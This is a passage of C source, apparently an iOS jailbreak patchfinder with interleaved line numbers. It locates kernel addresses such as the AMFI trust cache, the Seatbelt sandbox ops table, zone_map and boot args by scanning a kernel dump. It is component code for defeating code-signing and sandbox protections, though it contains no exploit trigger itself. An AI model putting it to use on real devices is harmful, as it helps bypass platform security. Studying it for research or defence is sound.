uint64_t ref = Find_strref("amfi_prevent_old_entitled_platform_binaries", 1, 1);
1018
if (!ref) {
1019
// iOS 11
1020
ref = Find_strref("com.apple.MobileFileIntegrity", 0, 1);
1021
if (!ref) {
1022
return 0;
1023
}
1024
ref -= KernDumpBase;
1025
call = Step64(Kernel, ref, 64, INSN_CALL);
1026
if (!call) {
1027
return 0;
1028
}
1029
call = Step64(Kernel, call + 4, 64, INSN_CALL);
1030
goto okay;
1031
}
1032
ref -= KernDumpBase;
1033
cbz = Step64(Kernel, ref, 32, INSN_CBZ);
1034
if (!cbz) {
1035
return 0;
1036
}
1037
call = Step64(Kernel, Follow_cbz(Kernel, cbz), 4, INSN_CALL);
1038
okay:
1039
if (!call) {
1040
return 0;
1041
}
1042
func = Follow_call64(Kernel, call);
1043
if (!func) {
1044
return 0;
1045
}
1046
val = Calc64(Kernel, func, func + 16, 8);
1047
if (!val) {
1048
ref = Find_strref("%s: only allowed process can check the trust cache", 1, 1); // Trying to find AppleMobileFileIntegrityUserClient::isCdhashInTrustCache
1049
if (!ref) {
1050
return 0;
1051
}
1052
ref -= KernDumpBase;
1053
call = Step64_back(Kernel, ref, 11*4, INSN_CALL);
1054
if (!call) {
1055
return 0;
1056
}
1057
func = Follow_call64(Kernel, call);
1058
if (!func) {
1059
return 0;
1060
}
1061
call = Step64(Kernel, func, 8*4, INSN_CALL);
1062
if (!call) {
1063
return 0;
1064
}
1065
func = Follow_call64(Kernel, call);
1066
if (!func) {
1067
return 0;
1068
}
1069
call = Step64(Kernel, func, 8*4, INSN_CALL);
1070
if (!call) {
1071
return 0;
1072
}
1073
call = Step64(Kernel, call+4, 8*4, INSN_CALL);
1074
if (!call) {
1075
return 0;
1076
}
1077
func = Follow_call64(Kernel, call);
1078
if (!func) {
1079
return 0;
1080
}
1081
call = Step64(Kernel, func, 12*4, INSN_CALL);
1082
if (!call) {
1083
return 0;
1084
}
1085
1086
val = Calc64(Kernel, call, call + 6*4, 21);
1087
}
1088
return val + KernDumpBase;
1089
}
1090
1091
1092
addr_t Find_zone_map_ref(void) {
1093
// \"Nothing being freed to the zone_map. start = end = %p\\n\"
1094
uint64_t val = KernDumpBase;
1095
1096
addr_t ref = Find_strref("\"Nothing being freed to the zone_map. start = end = %p\\n\"", 1, 0);
1097
ref -= KernDumpBase;
1098
1099
// skip add & adrp for panic str
1100
ref -= 8;
1101
1102
// adrp xX, #_zone_map@PAGE
1103
ref = Step64_back(Kernel, ref, 30, INSN_ADRP);
1104
1105
uint32_t *insn = (uint32_t*)(Kernel+ref);
1106
// get pc
1107
val += ((uint8_t*)(insn) - Kernel) & ~0xfff;
1108
uint8_t xm = *insn & 0x1f;
1109
1110
// don't ask, I wrote this at 5am
1111
val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);
1112
1113
// ldr x, [xX, #_zone_map@PAGEOFF]
1114
++insn;
1115
if ((*insn & 0xF9C00000) != 0xF9400000) {
1116
return 0;
1117
}
1118
1119
// xd == xX, xn == xX,
1120
if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {
1121
return 0;
1122
}
1123
1124
val += ((*insn >> 10) & 0xFFF) << 3;
1125
1126
return val;
1127
}
1128
1129
addr_t Find_OSBoolean_True() {
1130
addr_t val;
1131
addr_t ref = Find_strref("Delay Autounload", 0, 0);
1132
if (!ref) {
1133
return 0;
1134
}
1135
ref -= KernDumpBase;
1136
1137
addr_t weird_instruction = 0;
1138
for (int i = 4; i < 4*0x100; i+=4) {
1139
uint32_t op = *(uint32_t *)(Kernel + ref + i);
1140
if (op == 0x320003E0) {
1141
weird_instruction = ref+i;
1142
break;
1143
}
1144
}
1145
if (!weird_instruction) {
1146
return 0;
1147
}
1148
1149
val = Calc64(Kernel, ref, weird_instruction, 8);
1150
if (!val) {
1151
return 0;
1152
}
1153
1154
return KernelRead_64bits(val + KernDumpBase);
1155
}
1156
1157
addr_t Find_OSBoolean_False() {
1158
return Find_OSBoolean_True()+8;
1159
}
1160
addr_t Find_osunserializexml() {
1161
addr_t ref = Find_strref("OSUnserializeXML: %s near line %d\n", 1, 0);
1162
ref -= KernDumpBase;
1163
uint64_t start = BOF64(Kernel, XNUCore_Base, ref);
1164
return start + KernDumpBase;
1165
}
1166
1167
addr_t Find_smalloc() {
1168
addr_t ref = Find_strref("sandbox memory allocation failure", 1, 1);
1169
ref -= KernDumpBase;
1170
uint64_t start = BOF64(Kernel, Prelink_Base, ref);
1171
return start + KernDumpBase;
1172
}
1173
1174
addr_t Find_sbops() {
1175
addr_t off, what;
1176
uint8_t *str = Boyermoore_horspool_memmem(Kernel + PString_base, PString_size, (uint8_t *)"Seatbelt sandbox policy", sizeof("Seatbelt sandbox policy") - 1);
1177
if (!str) {
1178
return 0;
1179
}
1180
what = str - Kernel + KernDumpBase;
1181
for (off = 0; off < Kernel_size - Prelink_Base; off += 8) {
1182
if (*(uint64_t *)(Kernel + Prelink_Base + off) == what) {
1183
return *(uint64_t *)(Kernel + Prelink_Base + off + 24);
1184
}
1185
}
1186
return 0;
1187
}
1188
1189
uint64_t Find_bootargs(void) {
1190
1191
/*
1192
ADRP X8, #_PE_state@PAGE
1193
ADD X8, X8, #_PE_state@PAGEOFF
1194
LDR X8, [X8,#(PE_state__boot_args - 0xFFFFFFF0078BF098)]
1195
ADD X8, X8, #0x6C
1196
STR X8, [SP,#0x550+var_550]
1197
ADRP X0, #aBsdInitCannotF@PAGE ; "\"bsd_init: cannot find root vnode: %s"...
1198
ADD X0, X0, #aBsdInitCannotF@PAGEOFF ; "\"bsd_init: cannot find root vnode: %s"...
1199
BL _panic
1200
*/
1201
1202
addr_t ref = Find_strref("\"bsd_init: cannot find root vnode: %s\"", 1, 0);
1203
1204
if (ref == 0) {
1205
return 0;
1206
}
1207
1208
ref -= KernDumpBase;
1209
// skip add & adrp for panic str
1210
ref -= 8;
1211
uint32_t *insn = (uint32_t*)(Kernel+ref);
1212
1213
// skip str
1214
--insn;
1215
// add xX, xX, #cmdline_offset
1216
uint8_t xm = *insn&0x1f;
1217
if (((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {
1218
return 0;
1219
}
1220
1221
//cmdline_offset = (*insn>>10) & 0xfff;
1222
1223
uint64_t val = KernDumpBase;
1224
1225
--insn;
1226
// ldr xX, [xX, #(PE_state__boot_args - PE_state)]
1227
if ((*insn & 0xF9C00000) != 0xF9400000) {
1228
return 0;
1229
}
1230
// xd == xX, xn == xX,
1231
if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {
1232
return 0;
1233
}
1234
1235
val += ((*insn >> 10) & 0xFFF) << 3;
1236
1237
--insn;
1238
// add xX, xX, #_PE_state@PAGEOFF
1239
if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {
1240
return 0;
1241
}
1242
1243
val += (*insn>>10) & 0xfff;
1244
1245
--insn;
1246
if ((*insn & 0x1f) != xm) {
1247
return 0;
1248
}
1249
1250
// pc
1251
val += ((uint8_t*)(insn) - Kernel) & ~0xfff;
1252
1253
// don't ask, I wrote this at 5am
1254
val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);
1255
1256
return val;
1257
}
1258
1259
1260